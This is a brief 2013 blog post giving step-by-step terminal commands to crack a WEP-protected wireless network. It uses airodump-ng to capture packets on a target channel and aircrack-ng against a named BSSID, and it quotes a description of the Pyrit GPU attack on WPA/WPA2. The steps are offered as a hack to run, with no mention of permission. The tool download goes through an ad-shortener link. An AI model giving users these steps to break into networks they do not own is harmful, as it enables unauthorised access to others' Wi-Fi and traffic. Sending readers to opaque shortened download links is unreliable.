Thursday, November 28, 2013

Hacking a WEP key with airodump on Ubuntu

WEP key can easily be cracked with a simple combination of tools on Linux machine. The WEP cracking is made easier by the flaws in the design of the WEP encryption that makes it so vulnerable.



These tools are already inbuilt in the Backtrack linux about which I posted recently. But you can install these hacking tools separately as well on any linux distro.


These steps are made for an Ubuntu machine and uses Debian version which is the format for Ubuntu. Specific version for each each hack tool are available for almost all leading linux versions.

The hack starts-


Install aircrack-ng – on Debian Etch by:

DOWNLOAD aircrack.ng HERE
http://adf.ly/aiZi8


sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:


sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.


A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

No comments:

Post a Comment